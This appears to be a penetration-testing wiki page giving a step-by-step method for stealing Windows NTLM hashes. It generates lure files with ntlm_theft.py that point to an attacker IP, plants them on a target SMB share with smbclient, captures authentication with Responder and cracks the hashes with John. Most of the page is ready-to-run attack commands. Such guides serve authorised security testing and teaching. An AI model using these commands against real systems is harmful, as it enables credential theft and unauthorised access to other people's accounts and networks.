Attacks
Windows
Table of Contents
Dumping NTLM hashes via docx file using NTLM Theft
In this step of the exploitation process, we utilize ntlm_theft.py in conjunction with Responder to steal NTLM hashes from the target system. NTLM hashes are commonly used in Windows environments for authentication and can be valuable for further penetration testing.
https://github.com/Greenwolf/ntlm_theft
-
Generate Malicious Files: Execute
ntlm_theft.pywith appropriate parameters to generate files containing payloads designed to capture NTLM hashes:python3 ntlm_theft.py -g all -s <ATTACKER_IP> -f <OUTPUT_DIRECTORY>Explanation of options:
-g: Specifies the file types to generate for related attacks.-s: Sets the server's IP, which in this case is the IP address of our Kali machine where Responder will be running.-f: Specifies the filename for the generated files.
-
Upload Files to SMB Share: Upload the generated files to an SMB share on the target system, preferably in a location where they are likely to be accessed:
smbclient //<TARGET_IP>/<SHARE_NAME> -c "cd <DIRECTORY>; put <FILE_NAME>" -
Set Up Responder: Start Responder on your attacking machine to listen for LLMNR and NBT-NS requests and capture authentication attempts:
responder -I <INTERFACE> -
Trigger Authentication Requests: Wait for a user on the target system to access the uploaded files, triggering authentication requests containing NTLM hashes.
Once you have NTLM hashes, you can crack it with John or Hashcat.
john --format=NT --wordlist=<WORDLIST_FILE> <HASH_FILE>Last updated on